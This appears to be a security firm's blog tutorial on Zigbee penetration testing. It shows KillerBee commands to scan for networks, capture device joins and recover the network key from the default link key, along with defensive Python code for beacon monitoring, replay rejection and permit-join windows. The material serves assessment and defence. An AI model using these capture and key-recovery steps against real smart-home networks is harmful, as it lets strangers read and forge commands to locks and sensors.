Berkner Tech

Zigbee Security Testing for Smart Home Devices

Zigbee security testing pipeline for smart home devices, from channel scan to recovering the network key

Zigbee runs a huge share of smart-home gear: bulbs, sensors, locks, hubs. Its security rests entirely on key management, and the default link key that lets devices join is public knowledge. Capture the right handshake and the network key often falls into your lap. Here is how a Zigbee assessment goes.

Why Zigbee Keys Are the Whole Story

Zigbee encrypts its traffic, so the security of a network is the security of its keys. Devices join using a link key, then receive the network key. When the link key is the published default, anyone who captures a join can decrypt everything that follows.

Step 1: Find the Network

Sweep the 2.4 GHz Zigbee channels for active networks. zbstumbler sends a beacon request on each channel and reports the PAN ID, channel and stack profile of every network that answers:

zbstumbler
Example output
zbstumbler: Transmitting and receiving on interface 'kb0'

New Network: PANID 0x1A62  Source 0x0000
        Channel: 15
        Stack Profile: ZigBee PRO
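What zbstumbler prints comes straight out of the 802.15.4 beacon a coordinator answers with, and that beacon also carries the association-permit flag, which is how an open permit-join shows up to a passive listener. The parser below is an added example, not code from this page or from the KillerBee project; the beacon frame it decodes is constructed (no FCS), and the finding helper is a monitoring rule I have assumed for illustration.

```python
"""Decode what a Zigbee beacon exposes to anyone listening on the channel.

Added example (not from the page or KillerBee): parses an IEEE 802.15.4
beacon frame carrying a Zigbee beacon payload, i.e. the frame zbstumbler
reads to report PAN ID and stack profile.
"""
import struct

ZIGBEE_PROTOCOL_ID = 0x00
STACK_PROFILES = {0: "Network-specific", 1: "ZigBee", 2: "ZigBee PRO"}

# Constructed beacon (without the 2-byte FCS): coordinator 0x0000 of PAN
# 0x1A62, association permit set, ZigBee PRO, nwk protocol version 2.
SAMPLE_BEACON = bytes.fromhex(
    "0080"             # frame control: type=beacon, 16-bit source address
    "5a"               # sequence number
    "621a" "0000"      # source PAN ID 0x1A62, source address 0x0000
    "ffcf"             # superframe spec: BO/SO=15, PAN coordinator, assoc permit
    "00" "00"          # GTS spec (no descriptors), pending address spec (none)
    "00" "22" "84"     # Zigbee payload: protocol ID, profile|version, capacities
    "04030201004b1200" # extended PAN ID, little-endian on the air
    "ffffff" "00"      # tx offset, nwkUpdateId
)


def parse_zigbee_beacon(frame: bytes) -> dict:
    """Return the Zigbee-relevant fields of an unsecured beacon frame."""
    fcf, _seq = struct.unpack_from("<HB", frame, 0)
    if fcf & 0x7 != 0:
        raise ValueError(f"not a beacon frame (type {fcf & 0x7})")
    if (fcf >> 3) & 1:
        raise ValueError("secured beacon not handled by this parser")
    if (fcf >> 10) & 0x3 != 0 or (fcf >> 14) & 0x3 != 2:
        raise ValueError("beacon must carry only a 16-bit source address")
    pan_id, src_addr = struct.unpack_from("<HH", frame, 3)
    pos = 7
    sf_spec = struct.unpack_from("<H", frame, pos)[0]
    pos += 2
    gts_spec = frame[pos]
    pos += 1
    if gts_spec & 0x7:
        raise ValueError("GTS descriptors not handled by this parser")
    pend = frame[pos]
    pos += 1
    pos += 2 * (pend & 0x7) + 8 * ((pend >> 4) & 0x7)  # skip pending addresses
    payload = frame[pos:]
    if len(payload) < 15 or payload[0] != ZIGBEE_PROTOCOL_ID:
        raise ValueError("no Zigbee beacon payload")
    caps = payload[2]
    return {
        "pan_id": pan_id,
        "source": src_addr,
        "pan_coordinator": bool(sf_spec & 0x4000),
        "association_permit": bool(sf_spec & 0x8000),   # permit-join visible here
        "stack_profile": STACK_PROFILES.get(payload[1] & 0x0F, "reserved"),
        "nwk_protocol_version": payload[1] >> 4,
        "router_capacity": bool(caps & 0x04),
        "device_depth": (caps >> 3) & 0x0F,
        "end_device_capacity": bool(caps & 0x80),
        "extended_pan_id": payload[3:11][::-1].hex(),
        "update_id": payload[14],
    }


def permit_join_finding(info: dict):
    """Assumed monitor rule: a beacon advertising association permit outside a
    deliberate pairing window means the network is accepting joiners."""
    if info["association_permit"]:
        return f"permit-join open on PAN 0x{info['pan_id']:04X} (source 0x{info['source']:04X})"
    return None


if __name__ == "__main__":
    info = parse_zigbee_beacon(SAMPLE_BEACON)
    print(info)
    print(permit_join_finding(info))
```

The superframe specification's association-permit bit is the one worth watching: a product whose coordinator keeps advertising it long after pairing is leaving join open, which is the second of the weak points discussed below.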

Step 2: Capture the Join

Lock onto the channel and record. The frames you want are the ones exchanged when a device joins:

zbdump -c 15 -w capture.pcap
Example output
zbdump: listening on 'kb0', link-type DLT_IEEE802_15_4
^C24 packets captured

Step 3: Recover the Key

If a join was captured while the device used the default link key, the network key was transported protected only by that publicly known key, which is as good as in the clear. zbdsniff pulls it out:

zbdsniff capture.pcap
Example output
Processing capture.pcap
NWK Key found: 01 03 05 07 09 0b 0d 0f 00 02 04 06 08 0a 0c 0e

With the network key, every frame on that network is now readable and forgeable. That is a critical finding for any product that relies on Zigbee for a security function.

Three Zigbee Weak Points

The same handful of issues show up across Zigbee products:

- Default link key: devices join with the publicly known default link key, so a captured join hands over the network key.
- Open join: permit-join left enabled outside a deliberate pairing window lets any device join the network.
- Frame replay: without frame-counter enforcement, a captured command can be resent and accepted.

Defending a Zigbee Product

Use install codes or a unique pre-configured link key per device instead of the public default, keep permit-join closed except during a short, user-initiated pairing window, and enforce frame-counter checks so replayed commands are rejected. A security function such as a lock should never trust the Zigbee link alone.
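Two of those controls, the permit-join window and the frame-counter check, are small enough to model directly. The code below is an added example, not code from this page or from any Zigbee stack: a per-source, per-key incoming frame-counter guard that rejects replays and survives key rotation, plus a permit-join gate that fails closed once its window expires. Device addresses, counters and the clock values are constructed.

```python
"""Replay rejection and a bounded permit-join window, modelled in Python.

Added example (not from the page or any Zigbee stack). The frame counter is
the 32-bit counter carried in the Zigbee security header; the maximum value
is reserved, so a sender that reaches it must stop until the key is rotated.
"""
import time

FRAME_COUNTER_MAX = 0xFFFFFFFF


class ReplayGuard:
    """Tracks the highest frame counter accepted per (source, key sequence)."""

    def __init__(self, active_key_seqs):
        self.active = set(active_key_seqs)   # key sequence numbers we hold
        self.seen = {}                       # (src, key_seq) -> last accepted counter

    def rotate_key(self, new_seq, retire_seq=None):
        """Install a new network key; the new key starts a fresh counter space."""
        self.active.add(new_seq)
        if retire_seq is not None:
            self.active.discard(retire_seq)
            self.seen = {k: v for k, v in self.seen.items() if k[1] != retire_seq}

    def accept(self, src, key_seq, counter):
        """Return (accepted, reason) for a frame from src secured with key_seq."""
        if key_seq not in self.active:
            return False, f"unknown key sequence {key_seq}"
        if counter >= FRAME_COUNTER_MAX:
            return False, "frame counter exhausted; sender must wait for key rotation"
        last = self.seen.get((src, key_seq), -1)
        if counter <= last:
            return False, f"replay: counter {counter} not above last accepted {last}"
        self.seen[(src, key_seq)] = counter
        return True, "ok"


class PermitJoinGate:
    """Admit join requests only during a short window the user opened."""

    MAX_WINDOW = 254  # Zigbee 3.0 forbids a permanent (0xFF) permit-join duration

    def __init__(self, clock=time.monotonic):
        self.clock = clock          # injectable so the window can be tested
        self.closes_at = None
        self.log = []

    def open_window(self, seconds):
        self.closes_at = self.clock() + min(seconds, self.MAX_WINDOW)

    def is_open(self):
        if self.closes_at is not None and self.clock() < self.closes_at:
            return True
        self.closes_at = None       # expired or never opened: fail closed
        return False

    def on_join_request(self, device):
        decision = "accepted" if self.is_open() else "rejected: permit-join closed"
        self.log.append((device, decision))
        return decision == "accepted"


def demo():
    """Run constructed traffic through both controls and return the outcomes."""
    guard = ReplayGuard(active_key_seqs=[0])
    lock = 0x1234                            # constructed short address of a lock
    results = [
        guard.accept(lock, 0, 10)[0],        # first frame seen: accepted
        guard.accept(lock, 0, 11)[0],        # counter advanced: accepted
        guard.accept(lock, 0, 11)[0],        # exact replay: rejected
        guard.accept(lock, 0, 5)[0],         # older frame replayed: rejected
        guard.accept(lock, 1, 1)[0],         # key we do not hold: rejected
    ]
    guard.rotate_key(new_seq=1, retire_seq=0)
    results.append(guard.accept(lock, 1, 1)[0])    # fresh counter space: accepted
    results.append(guard.accept(lock, 0, 12)[0])   # retired key: rejected

    now = [100.0]                            # constructed fake clock
    gate = PermitJoinGate(clock=lambda: now[0])
    results.append(gate.on_join_request("bulb-A"))  # window never opened: rejected
    gate.open_window(60)
    results.append(gate.on_join_request("bulb-A"))  # inside window: accepted
    now[0] += 61
    results.append(gate.on_join_request("bulb-B"))  # window expired: rejected
    return results


if __name__ == "__main__":
    print(demo())
```

The counter is keyed by (source, key sequence) rather than by source alone so that a key rotation cannot be abused to wind a device's counter back, and the gate derives its state from the clock on every request instead of trusting a flag that someone forgot to clear.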

Where This Fits

Zigbee testing, from recovering keys to proving a command can be replayed, is a standard part of a smart-home penetration test. That radio work is exactly what we do at Berkner Tech.
